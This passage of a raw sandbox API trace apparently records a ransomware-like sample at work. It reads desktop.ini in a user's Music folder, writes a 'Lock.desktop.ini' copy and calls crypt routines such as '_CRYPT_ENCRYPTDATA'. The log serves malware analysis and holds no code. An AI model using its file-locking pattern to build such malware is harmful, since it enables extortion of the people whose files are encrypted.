lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a28 [0244.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0244.570] CryptDestroyHash (hHash=0xa86f90) returned 1 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.570] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0244.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0244.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.571] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0244.572] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.572] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0244.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0244.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0244.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0244.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0244.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0244.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0244.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x978490 [0244.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.574] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0244.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0244.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0244.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0244.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0244.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\music\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0244.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0244.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0244.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0244.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0244.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0244.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0244.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0244.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0244.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0244.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0244.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0244.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0244.644] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0244.644] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1f8, lpOverlapped=0x0) returned 1 [0244.646] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0244.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0244.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0244.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x978490 [0244.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e561a8 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0244.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x978490 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0244.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0244.650] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x978490 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0244.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0244.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0244.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x2e563a8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0244.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0244.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0244.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0244.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.653] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0244.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0244.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.653] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e68 | out: hHeap=0x970000) returned 1 [0244.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.653] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0244.653] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0244.653] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 